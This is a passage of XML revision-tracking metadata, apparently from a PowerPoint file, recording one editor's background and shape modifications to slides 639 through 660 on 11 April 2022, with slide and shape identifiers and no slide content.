        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1775645039" sldId="639"/>
            <ac:spMk id="2" creationId="{D6687D86-2355-4744-930E-3D0457CEE61D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1775645039" sldId="639"/>
            <ac:spMk id="3" creationId="{8874D8FD-A4C6-4A4A-8F93-61CB8AE0F442}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3136677582" sldId="640"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3136677582" sldId="640"/>
            <ac:spMk id="2" creationId="{D6687D86-2355-4744-930E-3D0457CEE61D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3136677582" sldId="640"/>
            <ac:spMk id="3" creationId="{8874D8FD-A4C6-4A4A-8F93-61CB8AE0F442}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="366911607" sldId="641"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="366911607" sldId="641"/>
            <ac:spMk id="2" creationId="{61536F8F-A917-4332-9B2D-64367B500F34}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="366911607" sldId="641"/>
            <ac:spMk id="3" creationId="{FA0C1F4D-141E-4EC0-9825-54796EF4E4EE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1036615483" sldId="642"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1036615483" sldId="642"/>
            <ac:spMk id="2" creationId="{C12E7632-0BD4-49DA-A83E-BB1A93BB31A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1036615483" sldId="642"/>
            <ac:spMk id="6" creationId="{4704ABEC-4F85-4A5E-B46A-48A8E64514E0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1575887676" sldId="643"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1575887676" sldId="643"/>
            <ac:spMk id="2" creationId="{7F09F895-C7DF-452E-999E-8F52C7DB8321}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1575887676" sldId="643"/>
            <ac:spMk id="6" creationId="{08604587-0830-48C5-A75C-1257D32A5D10}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1462552595" sldId="644"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1462552595" sldId="644"/>
            <ac:spMk id="2" creationId="{DAA453A5-4DD7-4F2C-B3F4-43AE0B1DD8C6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1462552595" sldId="644"/>
            <ac:spMk id="4" creationId="{14A728CD-B7F4-4882-A454-5082EB58B184}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1985877230" sldId="645"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1985877230" sldId="645"/>
            <ac:spMk id="2" creationId="{F8E31C96-02F2-4B39-A3D1-09E54AF6349A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3089841640" sldId="646"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3089841640" sldId="646"/>
            <ac:spMk id="4" creationId="{F0F957D6-27C0-6E42-8C05-8D1320AD1BDA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1687565053" sldId="647"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1687565053" sldId="647"/>
            <ac:spMk id="7" creationId="{E3CBD11B-49AB-450C-8399-EBF69253C10E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1687565053" sldId="647"/>
            <ac:spMk id="8" creationId="{9FE2540A-F81D-440C-B849-1EDF852385B8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="718227882" sldId="648"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="718227882" sldId="648"/>
            <ac:spMk id="2" creationId="{5AF085DD-C5D1-4AE6-B8DF-1138CFDC3D02}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="718227882" sldId="648"/>
            <ac:spMk id="3" creationId="{B2B140FB-B7B6-45A2-A4B7-CAD3EE143BAB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2283694582" sldId="649"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2283694582" sldId="649"/>
            <ac:spMk id="2" creationId="{6B36C5AD-048A-4E13-A9EC-CB67F20B99DB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2283694582" sldId="649"/>
            <ac:spMk id="3" creationId="{995AE914-40AF-4670-9A96-A0EE2C860F96}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2261148756" sldId="650"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2261148756" sldId="650"/>
            <ac:spMk id="2" creationId="{D9DBCB3A-5984-4F08-8E21-13BD9657A60A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2261148756" sldId="650"/>
            <ac:spMk id="3" creationId="{491E0846-9301-4222-B076-D9C43B76F206}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3090924884" sldId="651"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3090924884" sldId="651"/>
            <ac:spMk id="2" creationId="{8FB345F7-4EA0-478B-AF14-B589B32061FB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3090924884" sldId="651"/>
            <ac:spMk id="3" creationId="{A06E188B-FD2F-4132-B097-164571FCFBF7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3090924884" sldId="651"/>
            <ac:spMk id="5" creationId="{01DE8C56-E61F-4062-A0AE-675176C9526B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2809460110" sldId="652"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809460110" sldId="652"/>
            <ac:spMk id="2" creationId="{52A99152-EFC8-4D46-AD4D-75581D3991A1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809460110" sldId="652"/>
            <ac:spMk id="3" creationId="{AB1FCE8A-DB87-4E7F-949F-793EB864FA41}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2365158585" sldId="653"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2365158585" sldId="653"/>
            <ac:spMk id="2" creationId="{DEEAA938-E512-438F-8648-11475990B19A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2365158585" sldId="653"/>
            <ac:spMk id="3" creationId="{D8BE40C0-1026-4992-9964-129927A212C1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4237481030" sldId="654"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4237481030" sldId="654"/>
            <ac:spMk id="2" creationId="{91A0E319-0DB8-42C8-838A-A5AA1ACB0F2C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4237481030" sldId="654"/>
            <ac:spMk id="3" creationId="{AE19B50D-8815-473B-866E-E9D3F5967E5A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="288660377" sldId="655"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="288660377" sldId="655"/>
            <ac:spMk id="2" creationId="{397C53D8-3111-440C-944E-F4CB87DF31E6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="288660377" sldId="655"/>
            <ac:spMk id="3" creationId="{57B28C51-DB66-48EB-9C30-84EF1CE04EB3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="416650738" sldId="656"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="416650738" sldId="656"/>
            <ac:spMk id="2" creationId="{397C53D8-3111-440C-944E-F4CB87DF31E6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="416650738" sldId="656"/>
            <ac:spMk id="3" creationId="{57B28C51-DB66-48EB-9C30-84EF1CE04EB3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3736734637" sldId="657"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3736734637" sldId="657"/>
            <ac:spMk id="2" creationId="{6F0EA324-5A60-4233-B38F-61FD5B2F5C85}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3736734637" sldId="657"/>
            <ac:spMk id="3" creationId="{A55C8005-2241-4064-B797-69B6F2BCD35E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3585887871" sldId="658"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3585887871" sldId="658"/>
            <ac:spMk id="2" creationId="{39E995DB-4AE8-4F4E-90F5-DCA15F10F09D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3585887871" sldId="658"/>
            <ac:spMk id="6" creationId="{73D7DE3A-2366-4043-9C87-F27502C3B2D1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2674122216" sldId="659"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2674122216" sldId="659"/>
            <ac:spMk id="2" creationId="{A025265E-68E0-4634-952B-4CFE223F281D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2674122216" sldId="659"/>
            <ac:spMk id="3" creationId="{A1F02683-4AFA-4403-B705-39DF51CA1FBB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2202388216" sldId="660"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2202388216" sldId="660"/>
            <ac:spMk id="2" creationId="{5CAEED94-1AAB-4D96-87E4-4B8F05C5A2A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2202388216" sldId="660"/>
            <ac:spMk id="3" creationId="{0C48740C-20E8-405E-92C0-62DB825E00B2}"/>
          </ac:spMkLst>
        </pc:spChg>
